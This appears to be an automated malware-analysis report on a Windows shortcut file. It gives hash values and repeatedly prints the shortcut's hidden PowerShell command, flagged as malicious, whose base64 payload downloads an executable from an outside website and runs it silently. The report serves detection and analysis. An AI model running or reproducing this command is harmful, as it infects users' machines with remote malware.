|
Hash | Hash Value |
|---|---|
| MD5 | 0fa9232c069a73bd018a8cf28a0351e2
|
| Sha1 | ba9960018a65cc639e1238a5607f11807cfbc978
|
| Sha256 | d86c1f589136c80aaf1162651481efd79e01f3fe6ce1108faf90a8787f63d39a
|
| Sha384 | c344d050fc9f9218131682576df50e62bf6c59b32b0d0fbbb5cd3648f144156bbeb7c290a2f57d84a0097369295a28d4
|
| Sha512 | 8b8cae9a757fd6d5faf51c17753efaaf9668c52f7044e6f7b3de37e716edb65aee61d0bb2f49c4a7af2000097318a35035678a9fdc2aa1e6f5419e4c78e4f047
|
| SSDeep | 48:87/k0LdpVUJq1NY1xz41M//HxxoGiBHAiYH2fMI0a6v:87/kGA0NYjOMHx+jHAiI2kv
|
| TLSH | 2D71CE181AE55218D5A3CE397CF5A542CAA7FD27E8328E9E018E03454B53A14ED71F3E
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 > LNK CommandLine > [Deobfuscated PS] |